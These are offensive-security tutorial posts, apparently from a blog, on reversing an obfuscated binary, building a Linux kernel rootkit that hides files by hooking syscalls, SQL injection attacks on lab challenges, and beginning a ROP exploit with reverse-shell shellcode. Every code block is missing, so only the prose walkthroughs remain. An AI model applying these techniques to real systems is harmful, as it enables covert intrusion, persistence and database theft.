1 2 3 4 5 6 7 8 |
|
Firstly there is an assignment to bh (the second 8 bits of the EBX register) but then, on line 5, the whole EBX register is cleared using xor so line 2 is dead code.
The call instruction on line 3 and the jmp instruction on line 8 seem to be used just to confuse the reverser, there is no reason for this, but bare in mind that this would have stuck 4 bytes on the stack, next to the decoded data, which hasn't been cleaned up (this could effect the application in some way).
The rest of this code just zero's out EBX, ECX and EDX.
The next 8 instructions are very interesting:
1 2 3 4 5 6 7 8 |
|
Lines 1 and 3 fix the value of ESP after the call, jmp sequence earlier.
The rest xor's 0x5 with the byte at One and compares the result with 0x4. We can test this out in python, we know the byte at One is 0xed, so:
1 2 3 4 5 6 7 8 |
|
This isn't equal to 0x4 so the jump on line 8 will not be taken.
The next instruction lea ecx,[ebp-0xf]
loads EBP - 16 into ECX, ECX will now point to somewhere in the middle of the data (it will actually point 16 characters from the end, which is the start of the string I am not going!).
We can probably guess at what this is going to do from here but let's finish the analysis.
0x10 is then loaded into EDX and then 2 unconditional jumps are taken:
1 2 3 |
|
The only reason for these jumps is to confuse the reverser, we can just ignore them.
The next 7 lines is a very important part of the application:
1 2 3 4 5 6 7 |
|
So lines 1-4 set EAX to 0x4, lines 5 and 6 set EBX to 0x1 and then the interrupt *0x80 is initiated.
Interrupt 0x80 is a special interrupt which initiates a system call, the system call number has to be stored in EAX, which is 0x4 at this moment in time.
We can figure out what system call this is:
1 2 |
|
This makes sense, the prototype for this syscall is:
1 |
|
Each of the arguments go in EBX, ECX and EDX. So to write to stdout, EBX should be 1 which it is.
ECX should point to the string, which it currently points to I am not going!, and EDX should contain the number of characters to print which it does.
The last 4 instructions just run another syscall, exit, you can check this yourself if you wish:
1 2 3 4 |
|
Obviously we can now wrtie this in a much simpler way, but there is no need, we know exactly what this application does and how it does it.
Improving Obfuscation
As I mentioned earlier, the obfuscation could have been done better to make the reversing process harder. I actually purposefully made the obfuscation weaker than I could have to make the challenge easier.
Inserting more junk data inbetween some instructions could make the static disassembly significantly more difficult to read and understand.
I have to actually add a byte (0x89) at the end of the data section because the next few instructions were being obfuscated in a way that made them unreadable:
1 2 3 4 5 6 |
|
The disassembly shown here has had the last byte of the data removed and is the last line of the data section; and a few lines after.
As you can see the byte following the data section has been moved to the data section and as a result the next few instructions have been incorrectly disassembled.
This method can be implemented throughout the whole application, making most of the instructions disassemble incorrectly.
Constant unfolding could be improved here, for instance:
1 2 3 4 5 6 |
|
Could be rewritten to:
1 2 3 4 5 6 7 8 9 |
|
They both do the same thing but the second is a little harder to read, you could obviously keep extending this by implementing more and more complex algorithms to work out your required value.
This can also be applied to references to memory addresses, for instance, if you want to jump to a certain memory address, do some maths to work out the memory address before jumping there.
More advanced instructions could be used like imul, idiv, cmpsb, rol, stosb, rep, movsx, fadd, fcom... The list goes on...
The MMX and other unusual registers could have been taken advantage of.
Also, the key to decrypt the data could have been a command line argument or somehow retreived from outside of the application, this way it would have been extremely difficult decode the data.
Conclusion
There are sometimes easier ways to get a result other than reversing the whole application, maybe just understanding a few bits might be enough.
Although there are ways to make the reversers job more difficult, its never possible to make it impossible to reverse, providing the reverser is able to run the application (if the CPU can see the instructions, then so can the reverser).
A good knowledge of assembly is needed to do any type of indepth reverse engineering.
Further Reading
Reversing: Secrets of Reverse Engineering by Eldad Eilam
Rootkit for Hiding Files
In this post I am going to be putting together all of the knowledge we have gained in the previous posts and improving on the last rootkit in a few different ways.
I will fix the issue that I explained the last LKM had (being able to query the file directly using ls [filename]
), while making it more portable and giving it the ability to hide multiple files but I will start with splitting the LKM into multiple files to make it easier to manage.
The code for this rootkit will be in a link at the bottom of the post in .tgz format.
Splitting The LKM
Having the LKM split across multiple files makes it easier to manage, especially as the module gets more and more complex.
First we will start with the main file:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
I've made a couple of changes here, like I've set the sys_call_table page to read only after I've made the change and changing the name of the init and exit functions, but other than that it is copy and pasted from the last LKM.
Now for the file containing the system calls:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
|
We also need to create a header file for the syscalls so that the functions can be referenced from the main.c
file:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
This needs to be included in both the main.c
and syscalls.c
files, just add the line #include "syscalls.h"
somewhere near the top.
This is why we have to put #ifndef
, this ensures that the file will not be included twice.
Now we need to create the C file for the last set of functions:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
We also need to create a header file for these functions so we can use them inside main.c
:
1 2 3 4 5 6 7 |
|
This file also needs to be included in main.c
with the line #include "functs.h"
.
We now need a makefile:
1 2 3 |
|
I couldn't get it to work by just running make
so I had to run the full command myself:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
|
We can ignore these warnings for the moment, we are going to replace these functions anyway.
Now to test our rootkit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 |
|
So it seems to work nicely, now we can concentrate on extending it.
Automagically Finding sys_call_table
A brilliant writeup of how to find the sys_call_table, amungst other things, on x86 Linux is here. I highly recommend reading that post.
We are going to use the technique under section 3.1, titled How to get sys_call_table[] without LKM.
You can use a slight vairation of this technique on each architecture, just search Google a bit and you should be able to find something if you can't work it out from this description.
Firstly we need to read the Interrupt Descriptor Table Register (IDTR) and get the address of the base of the Interrupt Descriptor Table (IDT).
Offset 0x80 from the IDT base address is the address of a function called system_call
, this function uses call
to make system calls using the sys_call_table.
Once we have the base address of the system_call
function we need to search through its code for 3 bytes ("\xff\x14\x85").
The memmem
function just searches through code for a particular set of bytes and returns a pointer to it if found or NULL if not. Its implemented in libc but we will have to implement it ourselves in our LKM.
We also need to remember to include the 2 structs idtr and idt.
Here's the code for all of this which we can put into functs.c
:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
|
We also need to add the following prototype to functs.h
:
1 |
|
Lastly we need to edit main.c
so that we get the address of sys_call_table using this method, we just replace the line that starts sys_call_table =
with:
1 2 3 |
|
Improving The Method Of Writing To Read-Only Memory
So far we have manually changed the page table entry to change the permissions on the specific page that we want to write to read-write.
As we are running with the same privileges as the kernel we can do this in an easier way and ensure that any changes to this mechanism in the future doesn't stop our ability to write to this memory.
Running in kernel mode we have the ability to change the CR0 register.
The 16th bit of the CR0 register is responsible for enforcing whether or not the CPU can write to memory marked read-only.
With this is mind we can rewrite the functions that we were using in functs.c
for this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
|
I've changed the names to make it apparent that these functions are actually doing something different.
You also need to change the 2 prototypes in functs.h
to:
1 2 |
|
Lastly we need to edit main.c
, remember these new functions do not require an argument.
Multi-File Support
To support hiding multiple files we need to implement a character device to communicate with the rootkit (we could use a network connection but we'll take that up later) and we need a method of storing the data.
For storing the data we will use a linked list, the kernel has the ability to manipulate linked lists but I will create my own functions for doing this as a programming exercise (later we will investigate how to use the features already in the kernel).
Linked List
First let's create the linked list and the functions for adding and removing items:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
|
The structure of each element is defined at the top (lines 1 - 4), its pretty simple, just a basic singly linked list.
2 functions are then defined addfile
and remfile
, which are pretty self-explainitory, 1 thing to note here is that the vmalloc
function is being used to allocate the memory, which allocates a contiguous address range of virtual memory, this obviously means that vfree
has to be used to free the memory after.
Both of these functions take 1 argument, a string, and add or remove that string to the list depending on which function is called.
Its best to create a function that empties the list:
1 2 3 4 5 6 7 8 9 10 11 |
|
Lastly we need a function to check if a name exists in the list:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
This functions takes a string as an argument and iterates through the list checking, first the length, and then the whole string, against every entry in the list, if it finds a match it returns a 1
, otherwise it returns a 0
.
Initially I developed this linked list in a normal C application and just improved upon it and kernelfied it. :-) Here is my original application:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 |
|
Clearly this application is using more primitive versions of the addfile
and remfile
functions above. Its also using the usermode's malloc
and free
instead of vmalloc
and vfree
for obvious reasons.
I only included this to show how I've developed these functions in usermode and then converted it to kernelmode.
Anyway, the kernel functions above (addfile
, remfile
, emptylist
and lookupfilename
) as well as the struct declarations and definition should go into the file list.c
.
#include "list.h"
should be put at the top and the file list.h
should be created with the following:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
We need to include the linux/vmalloc.h header file for the vmalloc
and vfree
functions.
syscalls.c
needs to be changed, list.h
needs to be included, the FILE_NAME
definition should be removed and the strncmp
line should be changed to use lookupfilename
instead, so it should end up like the following:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
|
Because we want to hide some files when the LKM is loaded and also empty the list when the LKM is unloaded we need to include the list.h
header file and make the relevent calls to addfile
and emptylist
in main.c
, so our main.c
should end up like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 |
|
Lastly we need to edit the Makefile
to include list.o
, so it should end up like this:
1 2 3 |
|
Now to compile and test:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
|
So, as you can clearly see, our LKM automatically hides files on initialization and now should have the capability to hide multiple files.
Character Device
We now need the ability to communicate with the LKM to dynamically hide and unhide files. The only way we've learned how to do this so far is by using a character device.
This character device will be simpler than our previous one because we only need the write operation but you can implement read for feedback if you want.
We will put this in a new file:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
|
Here I'm setting the maximum size to 512 but you can set it to what you wish.
I also return the number of bytes written here so that it doesn't break some applications that try to write to it (python for example).
The first character of the input is being used as the operation (A or a for adding a file and R or r for removing a file) and the actual filename starts after the second character in the input.
I've also fixed the buffer overflow that was in the last character device.
We need to create the following header file:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
Now we need to include cdev.h
in main.c
, by adding the line #include "cdev.h"
at the top, initialize the device on load and remove the device on unload, so our main.c
should end up like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
|
Lastly we need to add cdev.o
to the makefile:
1 2 3 |
|
Now we just need to test it:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
|
As you can see, we are now able to hide and unhide files on demand, there is, however, still a problem:
1 2 3 4 5 6 |
|
Hiding Files Better
Now let's hide the files even when they are queried directly.
To figure out how to do this we will use the same method as we did when figuring out how to hide files to being with, by looking at the system calls that are being made and hooking them.
We will start by determining the system calls responsible for this:
1 2 3 4 5 |
|
I've grepped for the filename because the system call must be querying the filename directly, we've found 2 (stat64
and lstat64
).
It looks like it returns 0 when its successful, let's see what happens when its unsuccessful:
1 2 3 4 5 |
|
So they return -ENOENT
if the file does not exist.
Another thing to note about this output is that the second argument to both stat64
and lstat64
is a pointer to a buffer which on a success is populated by the system call and obviously left blank in a failure.
The manpage for these functions confirms that:
1 2 |
|
We don't care too much about the stat
struct because if it matches any of our hidden files we will just return -ENOENT
and otherwise we will forward the request to the original system call.
If we wanted to actually manipulate the results that applications got back from these systems calls, we could use this structure to do so.
One more thing to check is what the request looks like when a full path is given:
1 2 3 4 |
|
So the full path is passed to the system call, we will have to deal with this because obviously we only have a list of filenames so we will have to manually extract the actual filename to check against our list.
First let's write the function which extracts the filename from the full path and checks if it is in the list:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|
We need to add the prototype in list.h
so that the other files can use it:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
|
Now for the system calls, this should be added to syscalls.c
:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
And we need to update syscalls.h
:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
We need to include linux/stat.h because that includes the declaration of the stat64 structure.
And lastly we need to update main.c
to hook and unhook these 2 syscalls on load/unload:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
|
I've changed the files that it automatically hides when loaded to hidefiles (which is the name of the character device file) and hidefiles.ko (which is the name of the LKM) because this is more useful, in reality these would be named something less descriptive and the other source files wouldn't be there.
Finally to test it:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 |
|
Funnily enough this also hides directories with a name that is in the list but doesn't stop you from cd'ing there:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|
Anyway, our improved rootkit seems to work nicely and as expected.
It is still currently easy to detect our rootkit though:
1 2 |
|
You can get the full finished source code for the rootkit here.
Conclusion
We have used a number of techniques here to figure out how to hide files on the system and we have combined all of the knowledge we have gained to far to achieve this.
However, there are still a lot of ways we can improve this LKM, hiding the LKM's existence, and using the network to communicate are just a couple (we will take these up later).
When dealing with kernel code you have to be very careful as you can break the whole system, this is evident with the first character device that we created (just load the device and write 5000 bytes to it, the system will crash instantly).
Happy Kernel Hacking :-)
Further Reading
This article on Kernel Rootkit Tricks by Jürgen Quade
The Phrack article titled Linux on-the-fly kernel patching without LKM by sd and devik
Designing BSD Rootkits by Joseph Kong
And of course the kernel documentation
SQL Injections
Here I will demonstrate how to detect different SQL injection vulnerabilities and how to perform a few different SQL injection types using applications that are vulnerable to a second order SQL injection and 2 different blind SQL injection attacks.
The first I will look at is the second order SQL injection. A second order SQL injection happens when a user input is stored in the database but then later that input is retrieved and used in a different SQL query, its this second SQL query that is vulnerable to SQL injection.
Second Order SQL Injection
The application I will be testing is a challenge at securitytube's SQLi labs, challenge 13, here is challenge from the documentation:
As you can see we are told very little about the application and there are no rules, we just have to find the admin password and login as the admin.
Detection
First we have to look at the application by using it. When we visit the URL in the challenge we get:
By filling out the form and clicking the register me! button we get:
It looks like there is a login page too:
After logging in with the account we have just created we see the following:
So let's try using the classic single quote (') technique to see if anything different happens:
As you can see nothing different about the user account creation process, let's login with this new account:
You can see that the email address is no longer given. We can guess that the username is used in another query to retreive the email address after login and then presented to the user.
Confirmation
Now that we have a suspected SQL injection we need to confirm that it is infact an SQL injection vulnerability.
1 way to do this is by sending a syntactically correct query which is functionally the same as 1 which we know the result of.
To do this we need to guess the query being run, from what we know so far we can guess that the query is something like:
1 |
|
We also know a good username (foobar) and the resulting email address ([email protected]).
For the known good username the query would look something like:
1 |
|
We can inject foo' 'bar
as the username and it would be functionally the same and should result in the same email address being returned.
So the resulting query would look something like:
1 |
|
The above will work for MySQL databases but not MSSQL, Oracle or others so this is 1 way we can determine the database software that is in use.
If this doesn't work we could try putting a + inbetween the 2 strings for MSSQL or || for Oracle.
If we also make sure that the email address is different ([email protected]):
We will know if the injection has worked based on the value of the email address that we get back once we log in:
So it worked! Instead of getting back the email address that we registered with we got back the email address of the other account (foobar).
This means that there is almost definitely an exploitable SQL injection vulnerability and it also means we are very likely communicating with a MySQL database.
Exploitation
For exploitation here we are probably need to use a UNION based injection.
The UNION statement allows us to combine the result set of 2 or more SELECT statements.
However, before we can concentrate on exploitation we need to know the number of columns returned in the original query.
1 way we can figure this out by using the ORDER BY keyword.
First we order by 1, this will sort by the first column, so we inject foobar' order by 1 --
:
That worked because we received the email address meaning that there is at least 1 column returned, notice that we appended --
after the injection to comment out the rest of the query (the remaining single quote '), so the full query would look something like this:
1 |
|
Now we try ordering by 2 (or the second column):
Here we received no email address meaning that the original query is only returning 1 column, so the query probably looks more like this:
1 |
|
Now that we know the number of columns we can concentrate on the exploitation.
There is 1 more thing we need to do before inserting our UNION statement because the application will probably only return 1 entry from the result set, but we can test this by injecting something that will return more than 1 result:
So it only returned the email address meaning that only the first result is output to the page.
We can fix this by invalidating the first statement by inserting an always false statement after an AND and then inserting our UNION statement after that.
The resulting query will look something like this:
1 |
|
Here I am concatenating the output of @@version
(which displays the version of the server software), database()
(which displays the name of the current database) and current_user()
(which displays the current user that the web server is logged into the database):
So the name of the database is 2ndorder, we need this information to solve the challenge.
Concatenation is needed because we only have 1 field where we can return data, but you will see that, even though we only have 1 field, we can use this to return a large amount of data.
We will now use the information found in the previous query to learn the schema of the database.
We will use the information_schema database to find the schema and GROUP_CONCAT to concatenate the rows together:
As you can see, we now have the names of every table and every column in the 2ndorder database.
Now its trivial to get the admin password:
And finally logging in as admin to complete the challenge:
Content-based Blind SQL Injection
The second injection I will demonstrate is a content-based blind SQL injection.
A blind SQL injection is an SQL injection but where the result of the queries aren't output to the page.
What makes it content-based is that the page can be controlled in some manner.
For this I will be looking at challenge 5:
I will not solve the whole of this challenge here but get to a point where its trivial to solve it.
Detection
So we start like normal and use the application, here is the page you see when you load the website:
If we click Submit we get this:
So it looks like it tells us whether or not there were results returned by the query that runs in the background.
As normal we should add a single quote (') to see if we get a reaction:
Confirmation
So the job_title field might be vulnerable to SQL injection but we can try to confirm this using string concatenation, as we did before:
So we got the same result as the original query which strongly suggests that we have an SQL injection here.
Exploitation
This is pretty easy to exploit but we need to use a conditional statement.
We could use CASE but in this case we'll use IF.
This exploit could be made more efficient but I'll demonstrate that in the next example.
For now we'll determine the result byte-by-byte in a sequential manner.
First let's guess at what the actual query looks like:
1 |
|
What we want to do, based on our findings, is search through a string character by character and normally return no results but if we find the right character then return results.
We can use SUBSTR to search through a string, so if we create a query similar to this:
1 |
|
This checks the character at position i from the string returned by current_user() against the character c, if they are equal, it returns 1, making the query true and returning results, otherwise it returns 0, making the query false and not returning any results.
This way we will get a different page if the character c is correct than we will if the character is incorrect.
I've found that we can run into problems when we do it this way, the solution is to convert the character into its ascii decimal equivalent using the ASCII function and compare that with a number.
So it ends up like this:
1 |
|
Where i is the position as before but c is a numerical representation of a character that we are testing for.
Once we find the right value for c, we increment i and start again, until we've iterated through our whole character set and not found a match which means we've reached the end of the string.
So if the character matches, the page will return results otherwise it will not.
Using this information it is trivial to write a script that uses this technique to find out the current user of the database:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
You can use this to retrieve any data from the database by just changing current_user() to the query that returns the data that you want, for instance:
1 |
|
But bare in mind the more data you try to retrieve, the longer it will take.
Time-based Blind SQL Injection
Lastly I want to demonstrate a time-based injection.
A time-based injection is where the attacker injects a time delay into the query based on a condition and determines the result of the condition based on the time is took for the page to return.
For this I will use challenge 10:
This challenge can also be completed using a content-based approach but I will ignore that and use purely a time-based approach.
A time-based attack generally works where others might fail but it takes the longest so depending on the amount of data you want to retrieve, it might not be viable.
1 advantage of a time-based attack rather than the content-based attack that we performed in the last demonstration is that the time-based approach doesn't generate database errors, meaning it has less chance of being noticed.
Detection
So let's first look at the application:
So it looks like some sort of sorting page. We seem to have 3 options (Id, First Name and Surname).
Clicking the Submit Query button gives us:
So its sorted the returned values by the Id field, but this request was a post request so to look at the request properly we need another piece of software.
Anytime I am analysing a web application, I always have my browser setup to go through Burp Suite.
Burp Suite is an intercepting proxy which has a huge number of features and IMO is an absolute must when doing any web hacking.
Looking at the request in Burp, we see:
We can guess that the query that is being run in the background is something like:
1 |
|
The actual application gives us different results depending on our input, we have 1 result for each field (id, first_name and last_name) and 1 result for an error (the following page was generated by inserting a single quote (') in the sort_results field):
So we could actually test for 4 different possibilities with a single request, to do this we could inject the following conditional statement:
1 2 3 4 5 |
|
Here we are checking the first character for current_user() against 100 (d), 101 (e) and 102 (f).
If it is a d then the results will be sorted by the Id field, if it is a e they will be sorted by the first_name field, if it is a f they will be sorted by the last_name field and if it isn't any of those 3 then the query will fail and we will get the same page as when we entered the single quote.
But we are going to ignore this and imagine that the application never returns anything, just some generic page.
If this was the case the only option we have is time-based.
To test this all we have to do in this situation is inject sleep(5)
, if the application is vulnerable the page will take longer to return.
In other situations we might need to try injecting + sleep(5)
, ' + sleep(5) --
, ' + sleep(5) + '
, ' union select sleep(5) --
, ' union select null, sleep(5)#
and so on...
But this application does delay with the simple sleep(5)
injected.
Exploitation
Now we can use the information we have already to inject a conditional statement that only delays when we've found the correct character of a string.
Our injection will look something like this:
1 |
|
Or:
1 |
|
Both will work fine.
This time because we are using a time-based approach we want to try to speed things up by writing a script which has the ability to make multiple requests at once.
We can do this using multithreading and in python using the threading module.
I will use Queue for submitting the jobs to the threads and a list for getting the responses.
Here is the script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 |
|
So firstly, lines 5-8, I set the maximum length of the string that we are looking for, by default its 256 but can be changed by the first argument and should always be a multiple of 2.
Then, lines 10-13, I set the number of threads, by default its 3 because this is the limit that the Secritytube SQLi challenges allow but can be changed by the second argument.
I then create 2 classes that inherit from threading.Thread which allows then to be multithreaded.
The first of these classes, as the name suggests, gets the length of the string resulting from the query that we want to run.
The second, as the name also suggests, gets the characters.
First I launch a bunch of threads to find out the length of the string, and wait until they are finished.
Then I launch a bunch of threads to find out the value of each character.
I'm using 2 different methods of concurrency here, mainly to demonstrate both methods.
Bit-For-Bit Method
The first, to find the length, is a bit-for-bit check, basically I'm checking whether each bit in the result is a 1 or a 0.
To understand this you need to picture the numbers in their binary representation, so let's take the value 73.
So our string is 73 characters long, which means if I run the query length([query])
, it returns 73.
The binary representation of 73 is 01001001 using 8 bits.
Each bits value is 2^n, where n is the position of the bit minus 1 starting at the rightmost position.
So the first bit is a 1, its value is 2^0 or 1, the second bit is a 0 its value is 2^1 or 2, but because it is 0 we can ignore it.
If we continue this the bits with a 1 have the values, 1, 8 and 64, if we add these together we get 1+8+64=73.
So you can see how we can get the length of the string of less than 256 characters in no more than 8 requests.
The next question is how do we test if a certain bit is 1 or 0, the answer is bitwise operators.
Here I am using the AND or & operator, which returns a result where only bits in both operands where a 1.
Let's look at our example again, if we do 73 & 1 we get 1, if we do 73 & 2 we get 0 because the bit that represents 2 is not a 1 in 73.
Using this method our conditional query becomes length([query]) & [bit we are testing for] = [bit we are testing for]
.
This way we can, in theory, test for each bit position in parallel.
Obviously instead of returning 1 if the condition is true we will sleep for 3 seconds and check the response time.
Binary Search Method
The second check, to find out the actual characters, I am using a binary search.
Basically a binary search works by finding the middle of the search range and asking if its greater than that, efeectively narrowing the search by half every request, until the correct value has been found.
Let's take the same example as the example we looked at for the bit-for-bit method, so the value is 73.
The maximum value for 1 byte of data is always 255, so there are 256 possible values.
First we'll ask if 73 > 127, which the answer is no, so the max becomes 127, and the middle becomes min + ((max - min) / 2) or 1 + ((127 - 1) / 2) or 1 + (126 / 2) or 1 + 63 or 64.
Then we go again and ask if 73 > 64, the answer is yes, so the min becomes 65 and the mid becomes min + ((max - min) / 2) or 65 + ((127 - 65) / 2) or 65 + (62 / 2) or 65 + 31 or 96.
We can represent this type of comparison in our injection condition like this:
ascii(substr([query],[position we are testing],1))>[current mid value]
This continues until we find the correct value which takes 8 requests with a 32 bit value (up to 255).
Using this and substituting current_user%28%29
with any query that we want the output of we can enumerate anything in the database that the current user has permissions to view.
Because we know the number of characters we can do multiple characters in parallel.
Conclusion
You should now have a very good idea of how to look for and exploit SQL injection's in a blackbox way.
Every situation will be different which is why, even though a lot of the automated SQL injection tools out there (like sqlmap) are good in a lot of situations, you still need to understand how to do it all manually for when the tools fail.
Being able to script SQL injection tools is a necessity when dealing with blind SQL injections, trying to enumerate even small amounts of data when you only have the ability to extract 1 bit at a time would be a horrible task!
Further Reading
The best book I've read on SQL injection is Justin Clarke's SQL Injection Attacks and Defence and he goes into a lot more detail and situations than I can on this single post.
Beating ASLR and NX using ROP
So far we've only beat either ASLR or NX seperately, now I will demonstrate how to beat both of these protections at the same time.
To do this I will use ROP (Return-oriented programming). We've seen ROP briefly in the last post but now we will use it alot more extensively.
ROP itself is a very simple idea, in situations where its impossible to run your own code, you use the code already in the application to do what you want it to do.
As we saw in the post about beating ASLR with full ASLR enabled the only section that is static is the text segment which contains the applications own code.
The "Return to Libc" method won't work because dynamically loaded libraries aren't at the same segment of memory as the applications code so we can no longer predict what memory addresses these functions (or pointers to the functions) will be at.
Normal shellcode will not run because NX is enabled.
So we have to find a way to run our own code by using only the code which is always loaded at the same address in memory.
Its worth noting that every ROP exploit will be remarkably different, this is because we can only use the applications own code and every applications code is different, so the important thing to learn in this post is the methodlogy that I will use to build the exploit.
I will assume that you have an indepth knowledge of the IA32 architecture and how the calling convention used by Linux (cdecl) works.
The App
The application we will be attacking is the same application as in the beating ASLR post.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 |
|
The only thing I've changed here is the size of the input accepted by the server (from 1000 to 4096). This is because the payload I need to send is larger than 1000 bytes.
Setting Up The Environment
Because the application that we are attacking is so small, we need to compile it with the -static
flag, this will compile any libraries into the binary making for a larger text segment:
1 2 3 |
|
Its important to use the -static
flag, firstly because you won't have enough ROP gadgets to write the exploit otherwise and because nearly all real world applications are much bigger than this small 1 so compiling it with the libraries static will make it more realistic.
If you don't get 2 from /proc/sys/kernel/randomize_va_space then run (as root):
1 |
|
Getting Gadgets
To build a ROP exploit you need to find ROP gadgets.
A ROP gadget is 1 or more assembly instructions followed by a ret
(or return) instruction.
Finding these gadgets would be painful and slow manually so we will use an already avaliable tool ROPgadget by Jonathan Salwan of Shell Storm.
You can download the tool using git:
1 2 3 4 5 6 |
|
This script looks for all ROP gadgets in the application code and outputs them, there will be alot of output so redirect the output to a file to search through later:
1 |
|
The file (gadgets
) will contain lines in the form of:
[memory address] : [series of instructions at that address]
The first thing I looked for is an int 0x80
followed by a ret
:
1 |
|
There are none, this means we will have to do the attack in 1 syscall.
You can download the full list of ROP gadgets that I got here.
Testing New Shellcode
All of the shellcode I've written until now used multiple syscalls, we aren't able to do that now so we need 1 syscall that is useful for us.
To do this I will use the bash 1 liner here:
1 |
|
As before, although I'm doing everything over the loopback interface for ease and convenience, this could be done to any IP address.
I will use the execve
syscall for this, in C this would look like:
1 2 3 4 5 6 7 8 9 10 |
|
Using this, and already knowing (from previous posts) that the syscall number for execve is 11, we can create the same code in assembly and shellcode, first we need the strings in hex and backwards (because of the little endian architecture).
For this I will use a little python script I wrote:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Now we can just run this script with each of our strings as an argument:
1 2 3 4 5 6 7 8 9 10 11 12 |
|
Now we can build the shellcode in assembly:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 |
|
You can test this shellcode the way we have tested shellcode in the past, I won't do that because this post will be long enough anyway, just remember to use netcat to start listening because this will do a reverse shell connecting back to 127.0.0.1 on port 8000.
Searching Through The Gadgets
Now we know how the registers need to be setup when we execute the syscall we can go about searching through the avaliable gadgets to see what registers we have a lot of control of and what registers are more difficult to manipulate.
We can search the gadgets file with regex, like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
|
The search above searches for any gadgets that use the ecx register as the source operand.
We also use grep 'ret$'
at the end because we are only interested in gadgets that end with a ret
instruction (it also shows gadgets that end in int 0x80
otherwise).
After searching through the gadgets for a while it becomes obvious that the ecx register is 1 of the more difficult to manipulate, so we will use the eax, ebx and edx registers to manipulate the data and we want to sort out the final value of ecx near the start of the exploit.
While searching through the gadgets, it would be helpful to paste what look to be the most useful gadgets into a seperate file so that you don't have to keep searching through the full list of gadgets.
Building The ROP Exploit
